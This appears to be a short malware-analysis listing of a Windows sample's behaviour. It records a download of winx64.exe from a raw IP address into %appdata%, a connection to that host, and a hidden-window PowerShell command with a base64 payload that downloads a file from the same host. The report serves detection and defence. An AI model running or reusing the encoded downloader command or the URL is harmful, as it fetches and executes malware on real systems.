Technical information
- http://94.102.58.30/~trevor/winx64.exe as %appdata%\winx64.exe
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1880
- %TEMP%\784373.cvr
- '94.##2.58.30':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -window hidden -enc KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADQALgAxADAAMgAuADUAOAAuA...' (with a hidden window)